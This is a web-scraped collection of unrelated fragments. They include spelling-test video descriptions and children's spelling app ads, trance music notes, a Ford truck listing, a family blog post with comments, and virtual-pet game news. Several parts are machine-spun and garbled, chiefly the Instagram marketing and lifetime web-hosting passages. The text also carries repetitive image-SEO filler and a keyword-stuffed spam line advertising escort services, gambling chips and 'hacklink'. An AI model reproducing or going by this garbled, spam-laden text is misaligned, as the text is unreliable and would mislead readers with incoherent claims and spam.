Try your skills with this spelling test 95% of people fail. When was the last time you actually had to test your spelling skills? Your 6th-grade spelling bee? Autocorrect can sometimes annoy us and even leave us in some pretty awkward situations. But, be honest, we’ve kinda grown dependent on our phones’ and computers’ spell check feature. This quiz will be divided into simple, intermediate, and advanced sections with gradually increasing difficulty. And some of these words leave even the smartest completely baffled! Only 5% of people get all of them right! You’ll need to finish the sentences with the correctly spelled word. While you’re taking the test, keep track of the answers you get right. At the end of the video, you’ll get your results. Music: https://www.youtube.com/audiolibrary/music TIMESTAMPS Easy-peasy level 1:05 Level up 2:48 “Spelling Guru” level 4:30 The results: Less than 10 words 6:18 At least 10 words 6:27 10 to 14 correct words 6:33 All of 15 words 6:43 SUMMARY -The first 5 questions of the test are a warm-up before the real challenge. -It’s time to move one level up, can you make it? -Level 3 is a challenge only a real spelling guru can win at. Let’s see if you can proudly call yourself such a guru. -If you got less than 10 words right, you might want to consider working on your spelling skills a little more. -If you've chosen at least 10 correctly spelled words, your level is that of an extremely smart sixth-grader. -If your score is from 10 to 14 correct words, not too shabby! You can be proud of yourself for your spelling skills. -If you knew the spelling of all 15 words, you’ve passed the test that 95% of people fail. Subscribe to Bright Side : https://goo.gl/rQTJZz ---------------------------------------------------------------------------------------- Our Social Media: Facebook: https://www.facebook.com/brightside/ Instagram: https://www.instagram.com/brightgram/ 5-Minute Crafts Youtube: https://www.goo.gl/8JVmuC ---------------------------------------------------------------------------------------- For more videos and articles visit: http://www.brightside.me/
Can you pass this high school level spelling test that 90% of adults FAILED? Test your vocabulary and knowledge of advanced diction in under 5 minutes through this quick test! If you enjoy this video, be sure to leave a like and comment below. Also, tell us what you want to see next! 🆘🆘🇺🇸 Do you want to learn English? ⏭️ CLICK HERE: https://www.youtube.com/playlist?list=PLArVNLXaWpFfaybj5fj_vlAvvwk6bK7UL ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ ♦️ Thanks for watching! ♦️ This video create by TEAM3S. Do not re-upload! 🇺🇸 Don't foget Subcribe now ! http://goo.gl/aUYrCE to receive next lesson.
can you pass a 5th grade spelling test. the test include 4 spelling of a word upon which only one is correct, now you have to choose the correct spelling from 4.
This video will show you spelling practice games and activities we use in our homeschooling. *I forgot to mention one other idea. ooops! I draw a target on the whiteboard. Then I have my kids spell a word. If they get it correct, they can use their dart guns to shoot at the target and earn points. If they spell it incorrect, they forfeit their turn. FOLLOW ME on FB: https://www.facebook.com/Faith4llyHomemade/ Visit my Store (free downloads): https://www.teacherspayteachers.com/Store/Faith4lly-Homemade
This spelling test examines the ability to spell Consonant-Vowel-Consonant words with "short" or checked vowels (a as in cat, e as in red, i as in hit, o as in got, u as in mug), and covers all the consonant sounds of English except zh (as in beige, treasure and vision) in both initial and final position in words. Test words are all non-words, so learners can only pass this test if they can sound out words and write correct spellings for each sound. The test can't be done successfully just from visual memory, an inefficient literacy-learning strategy employed by many learners, and one which eventually leads to failure, though at first it can appear successful. The test answer key is at www.spelfabet.com.au/tests/level-1-test/l1-answers. Learners who make a lot of mistakes on this test might benefit from the Spelfabet Level 1 workbook and games, which practise the spelling patterns in this test. See www.spelfabet.com.au/materials.
Reading Eggs Spelling apps for Grades 1-6 are a fun and motivational way to teach kids how to spell. Each app holds 10 interactive spelling games -- each reinforcing a different literacy skill, including proofreading, word endings and plurals, compound words, syllables and much more! The Reading Eggs Spelling apps will boost your child's confidence with spelling, help expand their vocabulary, and develop their key literacy skills as they progress through an extensive collection of challenging words, activities, and contexts. Find out more at http://readingeggs.com.au/apps/spelling/
Ielts Spelling Test : All around the world, many people have been losing easy marks in the spelling questions of the IELTS listening test. There is only one way not to lose these easy marks. You should practice enough. We prepared a series of spelling exercises for you. Take a piece of paper in front of you and start writing the words you hear. At the end of each video the answer key is waiting for you. Good Luck in your IELTS Exam
www.LogicOfEnglish.com Spelling List 1 is an alternative list to use with the "Logic of English Essentials Curriculum" Lesson 1. This spelling list uses words spelled with the A-Z phonograms. However, it is a more advanced list that is appropriate for older students who desire to improve their spelling or learn the Logic of English. Spelling List 1 is the first in a series of spelling lists. The spelling lists in this series will benefit adult students who desire to improve their spelling and ESL and EFL students who desire to learn the linguistic structure of the language while building vocabulary. The list can also be used as the primary spelling curriculum for upper elementary through high school. Students using the Logic of English Spelling Lists would benefit from 1) Completing Part 1 of each lesson in the Logic of English Essentials Curriculum and 2) reading "Uncovering the Logic of English" by Denise Eide. https://www.logicofenglish.com/essentials http://www.logicofenglish.com/store/books
Kids Spelling Practice Game is a free spelling learning game for toddlers. This English spelling practice app will help your Kindergarten to improve spellings vocabulary of animals, vegetables, fruits and vehicle items. Play & Learn Children English spelling learning game, for kidz. We have added amazing sound and high-quality photos of each object's that give more fun while playing. Kids Spelling Practice is best free Educational game helps kids to learn to spell. This game has more than 200 words that will improve your child's vocabulary. Amazing graphics effects of this spelling practice app will give entertainment to your toddler. This is the best kids English practice app ever for every preschooler. It will give much knowledge to your lovely little champ. In this kids spelling practice game, we have added basic spelling of fruits, animals, vegetables and vehicle items. All the objects with its image and proper sound effects so that your kids can learn accurately pronounces of that words. With this awesome fun game, Kids will improve their speech skills. Whether your kid is in kindergarten, or going to attend preschool this is great English Practice application to shows children the alphabet letters of animals, vegetables, fruits and vehicle items and teach them to recognize letters as they appear and pronounce the letter to learn quickly with your mobile device. Google Play : https://goo.gl/3nTbXY __________________________________________________________ Subscribe our YouTube channel : https://goo.gl/MSyNYw
In Spelling Practice Puzzle Vocabulary Game for 3rd grade, kids will learn more than 100 frequently used spelling words. Spelling lists include the following: contractions, blends, vowel sounds, prefixes and suffixes, compound words, words with silent letters, easily confused spellings, and irregular plurals. The game are easy to understand for 3rd graders and present each set of words in a variety of ways to reinforce and give practice. Kids will not only practice spelling and build new vocabulary, but also having fun with puzzle in the same time. This spelling game practice for 3rd grade will: - Help kid prepare for an exam for spelling. - Support homeschool kids to practice spelling. - Give kids different activities and learn new vocabulary. - Keep your kids busy during breaks. Features: - Covers more than 100 frequently used vocabulary for 3rd graders - American voice over - Divided into 3 levels, easy, medium and hard This application is a great spelling practice for individual levels and homeschoolers. Great application to help third graders help spell better. Improve spelling for 3rd graders with this app.
How to play - Choose a Dolch Word List and listen to the words that the dragon says. Click and drag the letters to spell the correct word .....
Visit http://www.spellingcity.com Spelling TeachMe helps students learn the spelling of a word. It stimulates two learning modalities: visual and auditory. If you are a student, Spelling TeachMe is a great way to teach yourself spelling and this exercise also helps parents understand how to teach spelling to children to help them learn their words and practice for weekly spelling tests. http://www.spellingcity.com/teachme.html
If you need to practice the Spanish alphabet, you've come to the right place. Write down the words as you hear them spelled. It starts out pretty slow, but by the end, it's full speed. You'll get to practice every letter of the Spanish alphabet except for k, w and x.
Download now FREE: https://play.google.com/store/apps/details?id=com.spellingpracticegame.com.grade1 In Spelling Practice Puzzle Vocabulary Game for 1st grade, kids will learn more than 100 frequently used spelling words. Spelling lists include the following: contractions, blends, vowel sounds, prefixes and suffixes, compound words, words with silent letters, easily confused spellings, and irregular plurals. The game are easy to understand for 1st graders and present each set of words in a variety of ways to reinforce and give practice. Kids will not only practice spelling and build new vocabulary, but also having fun with puzzle in the same time. This spelling game practice for 1st grade will: - Help kid prepare for an exam for spelling. - Support homeschool kids to practice spelling. - Give kids different activities and learn new vocabulary. - Keep your kids busy during breaks. Features: - Covers more than 100 frequently used vocabulary for 1st graders - American voice over - Divided into 3 levels, easy, medium and hard This application is a great spelling practice for individual levels and homeschoolers. Great application to help first graders help spell better.
Download now FREE: https://play.google.com/store/apps/details?id=com.spellingpracticegame.com.grade2 In Spelling Practice Puzzle Vocabulary Game for 2nd grade, kids will learn more than 100 frequently used spelling words. Spelling lists include the following: contractions, blends, vowel sounds, prefixes and suffixes, compound words, words with silent letters, easily confused spellings, and irregular plurals. The game are easy to understand for 2nd graders and present each set of words in a variety of ways to reinforce and give practice. Kids will not only practice spelling and build new vocabulary, but also having fun with puzzle in the same time. This spelling game practice for 2nd grade will: - Help kid prepare for an exam for 2nd grade spelling. - Support homeschool kids to practice spelling. - Give kids different activities and learn new vocabulary for 2nd graders. - Keep your kids busy during breaks. Features: - Covers more than 100 frequently used vocabulary for 1st graders - American voice over - Divided into 3 levels, easy, medium and hard This application is a great spelling practice for individual levels and homeschoolers. Great application to help second graders help spell better. Improve spelling for 2nd graders with this app.
This video features three novel strategies that come from Amy Schwed and Janice Melichar-Utter's terrific book, Brain-Friendly Study Strategies, Grades 2-8. The strategies are designed to help children practice 6-letter, 7-letter, and 8-letter spelling words. Give these ideas a try in class with your students or at home with your children. A few months ago I officially re-launched my YouTube page as the "Teaching Kids" channel and posted my first new video of the school year. Each of my "Teaching Kids" videos features 1-2 minute tips for educators and parents and addresses a wide variety of topics that focus on teaching the whole child, including academics, character, and health. For more Teaching Tips, articles, and other resources on teaching the whole child, please visit www.stevereifman.com.
BigIQkids Spelling Program is a virtual spelling tutor that presents quizzes, spelling bees, spelling tests, and fun spelling games all customized to each child's abilities. Our students score 100% on every spelling test!
AppStore: https://itunes.apple.com/us/app/word-wizard-talking-movable/id447312716?mt=8 Word Wizard 4.0 adds 2 new fun spelling activities and, • Record Audio to Replace any Word or Phonic • 2 New Keyboards to Work on Digraphs (one for vowels like "oo", and one for consonants like "ch") • New U.S. male voice • Easy Word Lists Sharing with nearby devices
How good is your grammar? Do you know your ‘to’ from your ‘too’ and ‘two’ or your ‘their’ from your ‘they’re’ and ‘there’? Can you pass this simple grammar test that 90% will fail? If you do, it could be a big sign you're a natural born genius. ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● Only 5% Of Adults Can Pass This Elementary Test ➥ https://youtu.be/OLqAgRwM8G0 ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● ● If you enjoy my videos and would like to help support my channel, please feel free to donate to my tip jar ➤ https://goo.gl/mMvRfp Thank you A new English grammar quiz aims to put your knowledge of the English language to the test. These tough words and phrases often stump even the smartest people. Only ten percent will achieve the full marks, with 90% of people who take the quiz will fail. How smart are you, Can you pass this English grammar test? Go back to school and test your grammar with this online grammar lessons English quiz. All you need to do is fill in the blanks in a sentence by choosing from a selection of homonyms – only one is correct. Let's See how many you can get right. However, if you felt that you did well on this test, are you sure? Did you manage to find the two bonus grammar mistakes at the beginning and end of the test? If you did leave your results in the comments below. ★The Video is best viewed in HD★ ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● Music soundtracks from my video ➥ Brunno - Tropical City ● To be the first to know about my weekly videos you can either subscribe to my channel ➤➤➤ https://goo.gl/nszPFJ ● Or follow me on Twitter ● https://goo.gl/Efu80r ● for updates. ▶ Please enjoy these videos and feel free to Share these Amazing Mind Oddities on your social media. ▶ Visit my Instagram ● https://goo.gl/kfTDwF ● ▶ If you like the background music you can use it for free. For more information and free music check out the [Pure Music Mix] playlist for more details. ➥ https://goo.gl/2nLTpk ★★★★★ Music from my videos are free to use either under Creative Commons (CC) license or with credit given for more details view the links below. ★★★★★ ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● Follow Brunno: https://soundcloud.com/brunnoofficial https://www.facebook.com/pages/Brunno/641736429207425 https://twitter.com/brunorastija Follow Outertone: Website: http://outertone.com Facebook: https://www.facebook.com/outertonemusic Twitter: http://twitter.com/outertonemusic SoundCloud: https://soundcloud.com/outertone ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● So what's Mind oddities all about? It's about wonderful brain stuff & other curiosities. Featuring fun quirky videos for your entertainment. A fresh new video every week. Either Mind games, Brain Workouts, Personality Tests, Logical Thinking, Math Tricks Or Optical illusions. Set to an upbeat [Pure Music Mix] Soundtrack to relax your mind. To feed your curious mind Subscribe Now! To be updated on the latest Videos. https://goo.gl/nszPFJ I would love to get your feedback on my videos. If you have any questions or ideas, please leave a comment below it would help me out. Thank you.
The Sight Word Adventure: Kids practice for their spelling tests (Seven Academy) - Best App For Kids
The Sight Word Adventure: Kids practice for their spelling tests (Seven Academy) - Best App For Kids App Store Link: https://itunes.apple.com/app/id931529829 ***Parent's Choice Silver Award Winner Fall 2015*** Welcome to The Sight Word Adventure, a fun-filled game where children can learn to recognize, read, and write up to 320 sight words! The beloved game of Hide-and-Seek is the central point of the app because it symbolically explores the cognitive skills necessary to remember sight words such as: visual attention, the morphology of the forest setting (i.e. the letters in a word), active listening, and of course visual memorization. Developed with the The English Common Core State Standards in mind, this app will ensure that children have increased exposure to high frequency words that appear in text. These interactions will enable them to acquire the words into their long term memory. Our list was chosen based on Dolch’s and Fry’s compilations which account for over 50% of words that appear in printed text. Recommended Ages 3-8 FEATURES • 10 timeless mini-games • 320 sight words spread across 5 levels (PreK- Grade 3) • Algorithm that chooses words based on Hermann Ebbinghaus’ memory theories • Choose to play with UPPERCASE or lowercase letters • Personalized and customizable play to include specific sight words chosen by parents or teachers • Multi-user interface • Accessible to children with disabilities (VoiceOver compatible) • Universal app for iPad, iPhone and iPod Touch • Secure gaming environment: No ads, no external links, no in-app purchase, no social media access, no personal information request • Real time dashboard to track progress • Bright, colorful, and encouraging characters • Clear, concise instructions ABOUT US Seven Academy’s mission is to provide children with enjoyable early-learning activities using the latest technologies. Our team members, many of whom are young parents or teachers, strive to produce tools that motivate and inspire children to learn, play, and progress. PRIVACY We take your child’s privacy very seriously, for this reason, we are proud to offer a product that is certified COPPA compliant by Privo. CONNECT WITH US! If you have any support requests, comments, or questions do not hesitate to contact us at support@sevenacademy.com or visit the Seven Academy Online Community at sevenacademy.com. We’d love to hear from you!
You can download the file to what I'm using in the video here: http://bit.ly/XbmGwk A kids educational game for reading and spelling practice. Focusing on the "n", "gn" or "kn" special blends. Great for rhyming review as well. Theme: light green, dark green, frogs, lily pads, pond life, nature. Fun ideas and activities for primary school learning. http://earlylearningathome.com And visit my website http://icharacter.org to get children's eBooks and free downloads. And follow my facebook for new releases http://on.fb.me/1cwfT71. Thanks.
http://www.smartappsforkids.com/2014/02/review-nouns-with-spelling-test.html From the developers of Baby Flash Cards, comes this flashcard app with a focus on nouns. With over 500 word cards, this app offers opportunities for children to practice reading and spelling words. There are four existing lists of words divided into pre-primary, kindergarten, 1st grade, and 2nd grade. They each contain word cards that have the name of a noun printed along with a picture. The pre-primary list mainly has 3 letter words such as bag, dog, hay, and owl. The lists increase in difficulty up to the 2nd grade list that contains words such as bicycle, carriage, goldfish, and raccoon. Smart Apps for Kids http://www.smartappsforkids.com/
Business is an art of strategy; you always must think the creative ways to gain the competitive advantage. Applications that sprung up with the emergence of the smart phones have acquired the attention of the people in the present immensely. In a world that is run by a sophisticated technology, it could be such a waste if it was not used for the betterment of your business.
Just as much as the social media, apps have obtained the love of the people worldwide to such a great extent. It is in fact one of the most popular platforms to place your brand in. This popularity is rapidly being used by almost all the companies in the world. Hence, it can be effectively used to improve the branding process of the company given that people constantly engage in their smartphones. The more they see your logo, the more they will tend to shop at your business.
No matter how sleek your business and marketing strategies were, your service must be exquisite. After all, the purpose of marketing is to attract the customers. But to keep them in, you need to ensure that your service is in the best quality, always.
It is true that the development and assembling of a mobile application is a task that requires a lot of knowledge. But thanks to the advanced technology in the field, agile app development has become an easier task. As long as you’re consulting the correct people, it shouldn’t take a long time.
There are occasions where people have a very general idea about what they want but they just don’t know specifically. This could be a quite problematic situation when they keep asking about almost everything about your services. But with the help of mobile learning app for them, you’ll be able to educate them adequately enough so that the endless explanations from your side will not be necessary.
Special promotions will be easy to be advertised with the help of these applications. As long as it’s a user-friendly app, people will engage in it more, resulting greater sales in turn.
It is vital that your business adapts to the hastily changing world. If not, you’ll end up with less profits. But if you keep up with the technology, you will always have the better competitive advantage.
Daniel Lesden has fast become an exciting name with a more psy-trance approach to his music, while still keeping elements of melodic, uplifting trance. His last appearance on the label saw him remixing Mac & Mondays awesome track Yoruba.
This time he teams up with JOOF Recordings regular Mekka to create Aurora, a monster of a progressive track which oozes the kind of style and quality seen in the late 90’s early 00’s from the (back then) progressive house genre. Oh how times have changed! We think you’ll love this just as much as we do — its doesn’t have a typical done to death riff, the build that everyone else is doing, or a boring stripped back drop. Its a builder, laden with quality and unique arrangement. This is Borderline Music, this is Aurora!
It’s one of those tracks that can capture your imagination and is brave attempt to cross the forbidden boundaries between the two trance camps and bridge their separate worlds.
Added in 2017: it seems that all Borderline Music releases no longer available in stores due to the label being shut down. If you would like to get a copy of this track, feel free to drop me a message.
Borderline Music have a year of specials for you in 2013 that continues with a fantastic psy tinged remix of Mac & Monday’s debut monster track, Yoruba! Daniel Lesden is making waves within the progressive psy scene with his melodic touches on top of the grunt and drive of psy kicks and basslines. Here he works his style to amazing effect on Yoruba!
Millions of professionals globally are already using Instagram. Instagram has made they easier to transport pictures and present them with near friends and many people enjoy doing which. Apart from networking, you can making use of Instagram in a good solid more efficient significantly for marketing. Instagram is a large promotional tool you will can use up to promote your enterprise online.
Photos are significance a thousand lyrics and Instagram is considered to be all about video. If you are into Instagram to marketing purposes, followed by you ought to finally understand that non-selected photos do undoubtedly work. You will be needing to post footage of your product constantly. Posting family pictures of your merchandise is one at the best ways that of increasing your brand awareness in addition to the boost sales of your products. A new pictures do rather than necessarily need to be very professional. The key aspect is having the pictures highlight a person's main features on top of that functions of a person's goods you are almost always promoting. The pictures should appeal overwhelming audience on Instagram.
Videos too are really important in Instagram marketing. They can write and share a video with your company employees to promote a new product to be found at hand. An individual can perhaps even opt to help you do the new live software product review movie and promote it concerning Instagram. Prints and the latest viral video are whole lot appealing with regard to many people than text files. Networking files base higher risks of exploring viral whilst people portion them. They are what's more more brilliant than sms files. Create photos as well as a videos that particular show our brand record and values. So digital photography and video clips are noteworthy if users want at improve your current brand and sales.
To augment your visibility, you ought to develop and quickly share high-quality photos and videos in your feeds. Where necessary, hunt for professional assistance or strategies from a good solid photographer. However, you can use one great camera equipment to assume sharp image samples. Try for you to get personal images at best aspects. Edit this photos in support of better effects. Nowadays smart phone phones usually are equipped with photo changing tools for this reasoning. Instagram that has several photo editing tools. Have to put out this programmes for your Instagram marketing purpose.
Maintaining in contact with with our customers might be vital, primarily for developing business that has a minute market distribute. You may very well start with showing your clients because you are concerned for their insight. You can achieve our by responding to ones questions so comments. This guidance will improve user-generated articles and other content and quality as clearly as promote the view of your products in addition , business. An Instagram devotees can sufficiently influence ones success your enterprise, and clients should not at all underestimate all of them.
Hashtags are hands down relevant inside of Instagram marketing. You desire to use them due to the Instagram individual consumers interact making use of hashtags. Hashtags allow users to in order to make your contents searchable and are integral if you want on to increase this followers. Have tags like media do create a complete viral end result which is going to be beneficial to your business concern. You may want to also direct advantage including trending hashtags especially if the hashtags are appropriate to your amazing product. These is excellent because buy Instagram likes users can use hashtags to look for positions.
You require include business title in customers hashtags. Start using unique hashtags for a meaningful particular business campaign people run. Far from being only conducts this market place your campaign, but the product also provides a certain hashtag for your clientele to associate and contribute with alternative participants.
While taking on out Instagram marketing, you involve to become acquainted with that Instagram is a definite community composed of we with wide-ranging ideas, emotions, and environment. Always you ought to be friendly on everyone and so appreciate those time to connect while having you on your report. Always determine you listen closely to your clients.
Hello, This is my post about Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373, on this page you can see so beautiful design about Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373, the first picture in this post is the best picture we use about Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373, detail on photo's above, you can see in the second paragraph.
The first picture is a picture Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373, the image has been in named with : Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373, This image was posted on category : Architecture, have resolution : 480x373 pixel. This posting entitled Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373, and many people looking for about Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373 from search engine.
Because of the Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373 had many other pictures are related like, then you can choose it in gallery below. So it can be one of your inspirations in designing your own. You will see more pictures of Delightful Cloud Computing Providers On Architecture With Top 10 Vendors In India According To CIOs CIO Research Center 480x373 similar to this one from below. Enjoy our gallery!.
I’ll be sharing some personal & exclusive tracks, demos, and stories behind those songs with you! If you’d like to… https://t.co/AXMJItBD7G
RT @DalaiLama: The kind of behavior that really is spiritual practice consists of refraining from falsehood and abiding by the tru… https://t.co/oqoOV9908a
When I sat down and started playing around on the keys for this one, I had no idea what this song was going to become but it has become one of my favorite songs I've written. "D4YL" explores that moment when you're having existential thoughts about how amazing love can be while the world keeps spinning and the bartender keeps pouring you a drink.
Let me know what you think of the song in the comments below or send me a DM on instagram (www.instagram.com/vinniethebooh) letting me know if you have ever felt like you'd die for someones love.
Choose a color: Click the circle and choose the color of your preference. If this option is not available it would mean that the product you are viewing is only available in the combination of colors that appears in the sample image.
Choose a size: Click the trop down menu to choose from the standard sizes, the price will adjust based on your selection. The wallpaper and wallpaper borders are sold by sheet, if you are buying wallpaper choose the quantity of sheets you need to cover your wall.
Choose a position: You can buy our wall decals in the original or inverted position, choose the one you like the most.
Add it to your shopping cart: Once you have configured your wall art, click on the "Add to cart" button. From there, you can continue shopping or proceed to checkout to pay and choose the shipping option.
A piece of advice from our decoration experts: You can buy several decals to decorate your walls with a unique combination! For example, if you buy one of our tree wall decals, you can also buy a quote that goes with it.
Measures correspond to the wall decal as displayed in the image on the left. Some wall decals are delivered partially unassembled to facilitate its installation.
This wall decal was designed by our artists in Mexico. Great for decorating walls, doors and other smooth surfaces. Easy to install, watch our wall decal installation videos for more information. This product has a 5 year warranty.
This is the classic Ford truck that everyone is looking for. It is a super clean California truck with mileage believed to be original and correct, built back in the days when Ford became the best-selling trucks in America, a title they still hold. It's got all the good stuff. 4WD, air conditioning, and if the off-road Dubs aren't your style, the owner has a set original wheels and tires that may be available (ask for details). The Cream and Dark Brown two tone paint job on this truck is outstanding. You would be hard pressed to find any dust or imperfections and the body panels line up nicely. The new chrome front bumper shines brightly under that familiar grill flanked by rectangular headlights with FORD in script across the front of the hood. The dark brown on the side is trimmed out with thin chrome molding tracing the line over the fender wells with black and chrome body side molding running in a straight line along the top. The tailgate is trimmed out in dark brown sections trimmed in chrome on a cream background and FORD in bold letters set into a highly polished panel across the middle. There are new rubber seals around all the windows and Ford F250 Ranger Lariat badges on the front fenders. There are Carr step ups as well as new side mirrors and the lock and latch for the storage compartment are also new. Open the door and you will find a very clean interior that looks like new. It helps that most of it actually is new. The bench seat has a new seat cover that is beautiful and comfortable with medium brown seating surfaces surrounded by a bit of cream with dark brown completing the border. It matches the door panels nicely and there is also a new headliner which is trimmed in chrome and will help keep the cab noise down. A two-spoke steering wheel sits in front of a stock dash board dressed in wood tone panels and chrome edging. The shifter for the automatic transmission is on the column and the lever for the 4WD transfer case is on the floor. Ventilation controls, including those for the factory air conditioning, are just over an AM/FM radio. Ranger and Lariat badges appear on the glove box door and new carpeting is protected by floor mats. A really nice feature of this truck is that the mileage on the engine and drivetrain is believed to be correct at 60,536. That's barely through break in! The engine is a 400 cubic inch powerhouse. It was built by Ford using a tall block 351 Cleveland to accommodate a longer stroke, and benefits from the free breathing heads of the Cleveland motor. It is completely stock and even still has the flex duct that draws fresh air in from the grill to the air filter housing. There is a newer master cylinder and power brake booster for the front disc brakes as well as new A/C lines on the FOMOCO compressor. Power runs back through a 3-speed automatic transmission to the transfer case then the rear wheels and through manual hubs to the front wheels in 4WD. The stock wheels and tires are available from the owner if desired, but 20-inch Chrome Moto Metal wheels sporting 35 x 12.50 x 20 Courser MXT tires are outfitted on the truck right now. A super clean, low mileage, mid 70s California pickup. Dude! It doesn't get any better than this!
Outside my window...It is clear. The stars look as if you could reach out your hand and pluck on right out of the sky. It is 61* and will probably we closer to 40* by morning. Typical fall in Kansas
I am thinking...I am thinking I will not have very many nice days left to do my touch up painting outside and sand and paint the back door. Wish me luck!
I am looking forward to...Saturday October 25..the greenhouse down the road is selling their mums for 1/2 price. I think I'll get some for the patio
I am pondering...What to do with a teenage girl that doesn't seem to get that talking back is just not cool.....any ideas out there?
Hi Paula .. lots here and you do seem to be moving on - love the Fall doorway. Hope you get your doors painted up ... and you do seem organised .. sorry can't help re the youngster ... life sorts things out eventually I gather ..
I haven't found them all to be so sad. And they sure make one think deeply about things in the world
Well yes, to be fair, I have only read a couple of them so I should not lump all of her books into the same category LOL
Your front door looks beautiful and very inviting! Good luck with the teenaged girl issue. It will pass. Try to stay calm, don't let her "get you going". Keep me posted!!
I love your front door with the fall decorations! I'm going to try that baked taco recipe soon! No help with the talking back issue, didn't have that too much at home, I had the opposite, teens not talking, so maybe its better yours is at least talking?
Well you just described the teen boy. He is the one who doesn't talk. This will be my first time doing the baked tacos. They look good don't they?
It is nice weather but I hate that it means winter is coming. I will be begging for some of your weather come winter. And yes, that's my front entry. Town and Country, I'm blushing!!!
Teenaged girls talking back...hum....in my experience (raised two, been teacher and mentor to hundreds), it's usually them coming from a position of hurt in some area of their life and not having the communication skills to deal with it. If it's not hurt speaking, it could be entitlement speaking. Two good books on the subject are "Have a New Kid by Friday" and "Adolescence isn't Terminal (it Just Feels Like It)"--both by Dr. Kevin Lehman.
I love to hear what you might think. Leave me a comment. I guarantee though that I will delete your comment if you are just here to cause trouble. So tread lightly!
If your college, department, or student organization is not represented below, we invite you to contact us to establish a CAPS liaison for your area. In addition, if you have any specific updates and/or corrections regarding your information on this page, please email us at tabdulra@Central.UH.EDU.
istanbul escort beylikdüzü escort şirinevler escort kayseri escort escort bursa bursa escort escort bayan bursa kayseri escort bayan istanbul escort sakarya escort eskişehir escort antalya escort chip satışı zynga chip chip satışı zynga chip chip satışı zynga chip chip satışı zynga chip chip satışı zynga chip live stream pro7 sat 1 hacklink astropay astropay kart ankara oto çekici oto çekici istanbul escort bayan escort bayan istanbul memur alimi polis alimi webmaster forum hacklink Assassination | UİPORTAL
The absence of a shared international definition of one of the most toxic words in the political lexicon handicaps efforts to understand the reality behind the term, says Charles Townshend. One of the most remarkable features of the “war on terror” – linguistically, and also politically – has been the warriors’ characterisation of their target. They see terrorism as a …
Uiportal.net, 2006 yılından bugüne Uluslararası İlişkiler disiplinine, sizlerin de desteğiyle, özenli ve özverili bir hassasiyetle katkı sunmaya devam etmektedir. Çizgisini taraf olmaksızın koruyan uiportal, bilimi ve bilimsel çalışmaları referans almaktadır. Sizler de bilimsel çalışmalarınızı "Makale Gönder" sayfamızı inceledikten sonra editörlerimize ulaştırabilir ve bu sayede bilim yolculuğunda bize eşlik edebilirsiniz.
Following our “full on” week at Thaifex we said farewell to the rest of our contingent as they were heading home and on the Monday morning caught the train from Bangkok to Chiang Mai. We had arranged with a wonderful … Continue reading →
In the nutshell, Life time.Internet hosting simply just indicates The client pays one time for their internet hosting. They may go on to host their Web sites assuming that they like.
This is certainly the ultimate responsive subscriber development funnel, which funnels your prospects into a number of gross sales with ease.
You need to act at this time. Now in truth. There’s just no way I'm able to hold this give for yourself indefinitely. Thus, the Free of charge postcard mailing provide will expire permanently after the forty eight-hour time period is up. So don’t hold out a second additional and danger getting rid of out – just take motion right this moment.
You fellas are undertaking an excellent position listed here and also contributing to produce a trusted and clean up Net environment available. Thanks for effort and hard work you place into these in depth reviews. They genuinely are a great useful resource.
Anthony Low "The tools allow it to be really easy to setup a practical & appealing web page for somebody without knowledge. Our web-site was managing in an incredibly limited time. We’re incredibly satisfied with how our buyers are obtaining our Internet site."
Backup is a very serious required option in web hosting. Nonetheless, backup resources are Usually not no cost. They include an extra Invoice.
Enterprise-degree RAID storage: This web hosting approach offers you the quickly RAID storage and endless bandwidth you need to electrical power your business’s Web page.
Inside a electronic earth, data only issues if It is really well timed, pertinent, unbiased and credible. We guarantee to do regardless of what is necessary to deliver you the information you would like everytime you want it, to create our views reasonable and helpful, and to verify our specifics are correct.
Organization RAID Storage: providing you Together with the lightning quickly RAID storage you would like & unrestricted bandwidth to electricity your web sites.
Web hosting has finished a very good job for his or her buyer of licensing a take care of their a variety of Inventory Picture suppliers to present you with three,000 Royalty-Cost-free substantial-good quality photographs…
A lot of business owners and site owners have pretty rightly had different problems with this new internet hosting enterprise model. Lifetime web hosting designs absolutely are a internet marketing desire. But are they for true?
A further ingredient from Life span.Web hosting is you receive the inconceivably speedy RAID stockpiling that has a boundless facts transfer ability. This can be the issue which has manufactured Life time.
Our customers have seasoned each individual kind of set up, check here config and troubleshooting difficulty you are able to consider – and our tech support has observed all of it right before. And solved it all ahead of.
Current account upgrades will be vanishing in a week. If you have any desire to possess one of the After Easter or Moo items currently listed, now is the time to get them! Only Moomoo knows when those lovely items shall return!
There's news down the dragon tails that a certain dragon has need of more help. How many levels have YOU finished?
Please join us in wishing HAPPY BIRTHDAY to our esteemed leader, Clark!! To celebrate the week of MooMoo we, the Support Team have come up with some awesome festivities for you all to enjoy.
Next we have some GREAT Account Upgrades for you all to enjoy...we've re-released a very limited amount of the MooMoo Zodiac and the popular read..."MooMoo's Adventures in EvoWorld".
We also have a couple of avatars for you to find...we're not going to tell you where they are OR what they look like, but they are BOTH Clark/Birthday related!! Happy hunting guys!
Easter is over, wave buh-bye to all those lovely Easter treats in the Main Shops. No worries if you haven't completed the Egg Hunt yet, it will continue until the end of the month.
Congratulations to those who have already finished the Egg Hunt for this year! Shiny trophies have been added to those who have sent messages to the Support Team that they have finished.
This is also a reminder to keep hunting those pretty eggs! If you think you've got them all, send a message to one of the staff!
